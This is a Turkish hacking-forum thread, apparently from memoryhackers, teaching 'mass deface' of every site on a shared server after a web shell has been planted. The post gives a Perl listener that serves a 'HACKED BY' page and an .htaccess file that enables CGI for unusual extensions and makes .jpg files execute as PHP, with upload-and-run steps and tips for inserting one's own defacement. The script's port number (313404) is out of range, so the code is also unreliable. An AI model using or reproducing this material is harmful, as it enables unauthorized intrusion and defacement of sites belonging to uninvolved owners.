• Üyelik paylaşımı yasaktır! Hesabınızı başkalarına vermeyin! Hesap paylaşımları yasaklama ile sonuçlanacaktır.

Port hacking & mass deface

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

zer0day1556

Onaylı Üye
Beğeni Puanı
21
Merhaba değerli memoryhackers üyeleri, bugün sizlerle ilk konumu paylaşmak istiyorum port hacking..

Nedir bu port ?

Port, bir bilgisayarla dış aygıtlar arasındaki kablolu veya kablosuz iletişimi sağlayan veri kanalı. Portlar, seri ve paralel olmak üzere iki temel kısımda incelenir. SCSI, USB, PCMCIA gibi aynı anda birden fazla dış aygıtın bilgisayara bağlanabilmesine olanak tanıyan portlar da bulunmaktadır.

Mass Deface nedir?

Mass Deface diye adlandırılan bu işlem sunucuda,hosting de barınan birden fazla siteye index atmaya denir, bunu çeşitli yolları vardır bugün port ile mass deface yapacağız hemen başlayalım..

Şimdi, hedef sitemize shell attığımızı var sayıyorum artık sunucuda site sahibi kadar belki daha fazla yetkimiz var, öncelikle perl dili ile yazılmış olan benim geliştirmesini yaptığım bir tool'u sizlere tanıtmak istiyorum peki bu tool ne işe yaracak.

Şimdi arkadaşlar, aşşağıda vereceğim kodları bir metin belgesine atıp perl (.pl) olarak kayıt edip sunucuya yüklüyoruz.

/home/kullanıcı/public_html/upload/mh.pl dizinine upload ettiğimizi var sayalım, ve tabiki upload ettiğimiz klasöre .htacces dosyasınıda atmayı unutmuyoruz. şimdi execute yani komut çalıştır kısmından, perl dosyamızı çalıştıralım nasıl mı ?

perl mh.pl Diyerek dosyamızı çalıştırdı şimdi yapacağı işlem sunucudaki bütün sitelere, bakın sitedeki demiyorum sunucudaki bütün sitelere güvenli gibi görünün aslında indeximizi yansıtacak bir port acacak artık şansınıza, sunucuda kaç site varsa okadar zone sizindir.

indexinize,
Lütfen, Giriş yap veya Kayıt ol içerikteki bağlantıyı görüntülemek için!
şeklinde ulaşabilirsiniz.

Perl Dosyası
Kod:
#!/usr/bin/perl -w
use strict;
use IO::Socket;

sub Wait {
    wait; # wait needed to keep <defunct> pids from building up
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(
    LocalPort     => 313404,
    Type         => SOCK_STREAM,
    Reuse         => 1,
    Listen         => 10) or die "[email protected]\n";
my $client ;
while($client = $server->accept()) {
    select $client;
    print $client "HTTP/1.0 200 OK\r\n";
    print $client "Content-type: text/html\r\n\r\n";
    print $client 'HACKED BY Zer0day - MemoryHackers.org ';
}
continue {
    close($client); #kills hangs
    kill CHLD => -$$;
}

.HTACCES DOSYASI

Kod:
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script d4bos cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .d4bos
## END ##

Şimdi perl dosyasını kendinize göre editlemeye geçelim dostlar, " print $client 'HACKED BY Zer0day - MemoryHackers.org '; " Kısmına kendi index kodlarınızı yapıştırın.

my $server = IO::Socket::INET->new(
LocalPort => 313404, Kısmında ise, "313404" Yani sunucuda açılcak port adresini belirliyorsunuz.

Teşekkür ederim kesinlikle alıntı değildir konuyu baştan aşşağı kendim yazdım, kodlardaki bozuk yerleri kendim düzenledim kodları kendim YAZMADIM

RemziToker

Üye
Beğeni Puanı
2
Teşekkürler hocam bu tür Türkçe kaynakları bulmak zor en azından bilen birileri paylaşınca hoş oluyor.

zer0day1556

Onaylı Üye
Beğeni Puanı
21
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Üst Alt